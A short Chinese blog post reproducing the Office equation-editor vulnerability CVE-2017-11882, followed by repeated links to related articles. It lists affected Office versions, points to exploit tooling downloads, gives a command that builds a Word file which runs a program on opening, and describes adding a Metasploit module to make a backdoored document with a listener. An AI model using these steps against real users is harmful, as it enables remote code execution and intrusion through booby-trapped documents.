CVE-2017-11882 通杀所有office版本

作者: 原来是老王 | 来源:发表于2019-09-17 15:48 被阅读0次

CVE-2017-11882 通杀所有office版本
office远程代码执行(CVE-2017-11882)
【漏洞复现】CVE-2017-11882（通杀Office 20
[基础] 如何判断你的Office版本和位数？
[漏洞复现]office CVE-2017-11882
PPT学习day2
怎么下载激活全套office，这可能是全网最简单的教程了
office365安装与激活(2019年版本)
VBA开发Excel插件工具
抠图换底色换背景必须用PS？不，用PPT就行！

影响版本：

office 2003
office 2007
office 2010
office 2013
office 2016

工具

https://github.com/Ridter/CVE-2017-11882/
链接: https://pan.baidu.com/s/1wkQ3WXps24D6_RB-jW5mLw 提取码: vd99

实验流程

生成word文档test.doc，打开doc文件之后，会弹出计算器（以此验证offce漏洞）

python2 Command43b_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc

在Kali Linux上构造带有shell后门的word文件，并开启监听
CVE-2017-11882.rb和ms17-010.rb放一起吧。
ms17-010.rb文件的路径是：/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17-010.rb，把CVE-2017-11882.rb放smb下面，和ms17-010在一起。

CVE-2017-11882 通杀所有office版本
影响版本： office 2003office 2007office 2010office 2013office ...
office远程代码执行(CVE-2017-11882)
office远程代码执行(CVE-2017-11882) 影响版本： MicrosoftOffice 2000 M...
【漏洞复现】CVE-2017-11882（通杀Office 20
1、漏洞概述此漏洞是由Office软件里面的 [公式编辑器] 造成的，由于编辑器进程没有对名称长度进行校验，导致...
[基础] 如何判断你的Office版本和位数？
获取 Office 安装版本 Office 2003 Office 2007 Office 2010 Office...
[漏洞复现]office CVE-2017-11882
1、漏洞概述此漏洞是由Office软件里面的 [公式编辑器] 造成的，由于编辑器进程没有对名称长度进行校验，导致...
PPT学习day2
PPT学习day2 ——建议使用office版本：office365、office2016、office2013 ...
怎么下载激活全套office，这可能是全网最简单的教程了
常见的白嫖office的办法就是用kms进行激活，不过kms也有缺点，一是，不是所有版本的office都可以激活，...
office365安装与激活(2019年版本)
一、office365软件的下载为什么要下载最新版本的office365，而不安装office2019版本呢？因...
VBA开发Excel插件工具
1、Office，建议使用正版，价格厚道。目前最新的版本是Office2019和Office365，建议使用...
抠图换底色换背景必须用PS？不，用PPT就行！
内容提要：在Microsoft Office 2010以上版本中（推荐Office 2016[http://mp...